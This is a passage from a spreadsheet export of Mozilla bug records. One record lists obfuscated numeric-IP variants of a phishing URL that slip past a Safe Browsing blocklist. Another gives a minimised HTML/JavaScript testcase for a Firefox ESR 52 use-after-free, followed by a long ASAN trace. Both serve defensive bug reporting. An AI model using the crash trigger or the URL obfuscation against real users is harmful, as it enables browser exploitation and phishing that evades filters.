        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6442" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6442" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6442" t="inlineStr"/>
      <c r="Q6442" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6442" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6442" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6442" t="n">
        <v>1</v>
      </c>
      <c r="U6442" t="n">
        <v>0</v>
      </c>
      <c r="V6442" t="n">
        <v>38</v>
      </c>
      <c r="W6442" t="inlineStr">
        <is>
          <t>We should be normalizing numeric domains (hex/oct/dec form) for urls that appear on -url and -domain tables.  For example, goog-black-url currently has http://24.172.137.213/http.www.paypal.com/cgi-bin/webscrcmd=_login-run/                        , but a warning doesn't trigger on the following:
http://0x18.0xac.0x89.0xd5/http.www.paypal.com/cgi-bin/webscrcmd=_login-run/                  
http://030.0254.0211.0325/http.www.paypal.com/cgi-bin/webscrcmd=_login-run/                  
http://0x18ac89d5/http.www.paypal.com/cgi-bin/webscrcmd=_login-run/                           
http://413960661/http.www.paypal.com/cgi-bin/webscrcmd=_login-run/                           
http://03053104725/http.www.paypal.com/cgi-bin/webscrcmd=_login-run/</t>
        </is>
      </c>
      <c r="X6442" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6443">
      <c r="A6443" t="n">
        <v>1416878</v>
      </c>
      <c r="B6443" t="inlineStr">
        <is>
          <t>2017-11-13 12:39:05 -0800</t>
        </is>
      </c>
      <c r="C6443" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsWebShellWindow::WindowResized</t>
        </is>
      </c>
      <c r="D6443" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:19 -0700</t>
        </is>
      </c>
      <c r="E6443" t="n">
        <v>1</v>
      </c>
      <c r="F6443" t="n">
        <v>1</v>
      </c>
      <c r="G6443" t="n">
        <v>3</v>
      </c>
      <c r="H6443" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6443" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6443" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6443" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L6443" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6443" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6443" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6443" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6443" t="inlineStr">
        <is>
          <t>[adv-main58+][adv-esr52.6+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q6443" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6443" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6443" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T6443" t="n">
        <v>1</v>
      </c>
      <c r="U6443" t="n">
        <v>0</v>
      </c>
      <c r="V6443" t="n">
        <v>39</v>
      </c>
      <c r="W6443" t="inlineStr">
        <is>
          <t>Created attachment 8927963
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox ESR 52.5.0 (SourceStamp=f9df5238dca13e40b8128faba317df25e2f69249). It requires the fuzzPriv extension and might need a few attempts to reproduce. Loading the testcase in multiple tabs at the same time helps with reproducibility.
crash.html:
&lt;script&gt;
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try{x.send("X");}catch(e){}
}
function start () {	
	o1=window.open('data:text/html,&lt;div&gt;','popup54','height=1');
	window.top.setTimeout(fun0, 400);
}
function fun0() {
	o1.onresize=fun1;
	o1.resizeTo(10,-40961);
	o1.resizeBy(1,-16);
}
var x=0;
function fun1() {
	if(x++) return;
	o1.close();
	for(var x=0; x&lt;10; x++) spin();
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
	window.setTimeout("location.reload()",100);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==5553==ERROR: AddressSanitizer: heap-use-after-free on address 0x61200022e6db at pc 0x7fce4a05c116 bp 0x7ffcb1e3c310 sp 0x7ffcb1e3c308
READ of size 1 at 0x61200022e6db thread T0
    #0 0x7fce4a05c115 in IsLocked /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.h:74:35
    #1 0x7fce4a05c115 in WindowResized /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:302
    #2 0x7fce4a05c115 in non-virtual thunk to nsWebShellWindow::WindowResized(nsIWidget*, int, int) /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:294
    #3 0x7fce488a5d62 in DispatchResized /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:550:9
    #4 0x7fce488a5d62 in nsWindow::Resize(double, double, bool) /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:1140
    #5 0x7fce4a071c2c in nsXULWindow::SetSize(int, int, bool) /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.cpp:624:17
    #6 0x7fce44d51f3e in nsGlobalWindow::ResizeByOuter(int, int, mozilla::ErrorResult&amp;, bool) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:7965:12
    #7 0x7fce4633899d in mozilla::dom::WindowBinding::resizeBy(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindow*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:3467:3
    #8 0x7fce4632ff69 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15158:13
    #9 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #10 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #11 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #12 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #13 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #14 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #15 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #16 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #17 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #18 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #19 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #20 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #21 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #22 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #23 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #24 0x7fce466d7769 in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #25 0x7fce44d87167 in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:70:12
    #26 0x7fce44d87167 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13029
    #27 0x7fce44d88f00 in nsGlobalWindow::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13308:32
    #28 0x7fce44f68972 in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:63:3
    #29 0x7fce42435039 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:479:7
    #30 0x7fce4240948c in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:285:3
    #31 0x7fce424254c2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:161:15
    #32 0x7fce42424e8f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #33 0x7fce42417cab in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #34 0x7fce42499dec in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #35 0x7fce4872fa74 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::XMLHttpRequestMainThread::RequestBodyBase const*) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2956:14
    #36 0x7fce4874bfb3 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.h:380:13
    #37 0x7fce463eb4bb in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:781:7
    #38 0x7fce46baa5f9 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
    #39 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #40 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #41 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #42 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #43 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #44 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #45 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #46 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #47 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #48 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #49 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #50 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #51 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #52 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #53 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #54 0x7fce46593bcf in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #55 0x7fce46fc430a in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #56 0x7fce46fc430a in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #57 0x7fce46f8e6ad in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134:16
    #58 0x7fce46f900d7 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
    #59 0x7fce46f7ae36 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #60 0x7fce46f7e4c8 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #61 0x7fce4920a5f3 in PresShell::FireResizeEvent() /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:2038:5
    #62 0x7fce492201a8 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4122:7
    #63 0x7fce4920e7e6 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4054:3
    #64 0x7fce4920e7e6 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4022
    #65 0x7fce4920e7e6 in PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:9217
    #66 0x7fce4920b1ad in PresShell::ResizeReflowIgnoreOverride(int, int, int, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1974:7
    #67 0x7fce487e5bb0 in DoSetWindowDimensions /home/worker/workspace/build/src/view/nsViewManager.cpp:192:7
    #68 0x7fce487e5bb0 in nsViewManager::SetWindowDimensions(int, int, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:228
    #69 0x7fce4917ffbf in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2005:5
    #70 0x7fce4918012b in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2019:5
    #71 0x7fce49f0812c in SetPositionAndSize /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5999:19
    #72 0x7fce49f0812c in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5985
    #73 0x7fce4511d224 in nsFrameLoader::UpdateBaseWindowPositionAndSize(nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2500:5
    #74 0x7fce4511cc7e in nsFrameLoader::UpdatePositionAndSize(nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2472:3
    #75 0x7fce4951fc6d in ReflowFinished /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:817:5
    #76 0x7fce4951fc6d in non-virtual thunk to nsSubDocumentFrame::ReflowFinished() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:812
    #77 0x7fce4920e753 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4013:12
    #78 0x7fce4920e753 in PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:9217
    #79 0x7fce4920b1ad in PresShell::ResizeReflowIgnoreOverride(int, int, int, int) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:1974:7
    #80 0x7fce487e5bb0 in DoSetWindowDimensions /home/worker/workspace/build/src/view/nsViewManager.cpp:192:7
    #81 0x7fce487e5bb0 in nsViewManager::SetWindowDimensions(int, int, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:228
    #82 0x7fce4917ffbf in nsDocumentViewer::SetBoundsWithFlags(mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, unsigned int) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2005:5
    #83 0x7fce49f0812c in SetPositionAndSize /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5999:19
    #84 0x7fce49f0812c in non-virtual thunk to nsDocShell::SetPositionAndSize(int, int, int, int, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5985
    #85 0x7fce4a05c034 in WindowResized /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:298:5
    #86 0x7fce4a05c034 in non-virtual thunk to nsWebShellWindow::WindowResized(nsIWidget*, int, int) /home/worker/workspace/build/src/xpfe/appshell/nsWebShellWindow.cpp:294
    #87 0x7fce488a5d62 in DispatchResized /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:550:9
    #88 0x7fce488a5d62 in nsWindow::Resize(double, double, bool) /home/worker/workspace/build/src/widget/gtk/nsWindow.cpp:1140
    #89 0x7fce4a071c2c in nsXULWindow::SetSize(int, int, bool) /home/worker/workspace/build/src/xpfe/appshell/nsXULWindow.cpp:624:17
    #90 0x7fce44d51f3e in nsGlobalWindow::ResizeByOuter(int, int, mozilla::ErrorResult&amp;, bool) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:7965:12
    #91 0x7fce4633899d in mozilla::dom::WindowBinding::resizeBy(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindow*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:3467:3
    #92 0x7fce4632ff69 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15158:13
    #93 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #94 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #95 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #96 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #97 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #98 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #99 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #100 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #101 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #102 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #103 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #104 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #105 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #106 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #107 0x7fce4ca0ac7d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #108 0x7fce466d7769 in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #109 0x7fce44d87167 in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:70:12
    #110 0x7fce44d87167 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13029
    #111 0x7fce44d88f00 in nsGlobalWindow::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13308:32
    #112 0x7fce44f68972 in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:63:3
    #113 0x7fce42435039 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:479:7
    #114 0x7fce4240948c in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:285:3
    #115 0x7fce424254c2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:161:15
    #116 0x7fce42424e8f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:7
    #117 0x7fce42417cab in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #118 0x7fce42499dec in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #119 0x7fce4872fa74 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::XMLHttpRequestMainThread::RequestBodyBase const*) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2956:14
    #120 0x7fce4874bfb3 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.h:380:13
    #121 0x7fce463eb4bb in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:781:7
    #122 0x7fce46baa5f9 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2904:13
    #123 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #124 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #125 0x7fce4cf1977f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #126 0x7fce4cf1977f in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #127 0x7fce4cefe93d in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #128 0x7fce4cf399df in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #129 0x7fce4cf3a022 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #130 0x7fce4cca869c in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #131 0x7fce4cc77ccf in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #132 0x7fce4cc857bf in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #133 0x7fce4cc87f6e in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #134 0x7fce4cf39375 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #135 0x7fce4cf39375 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
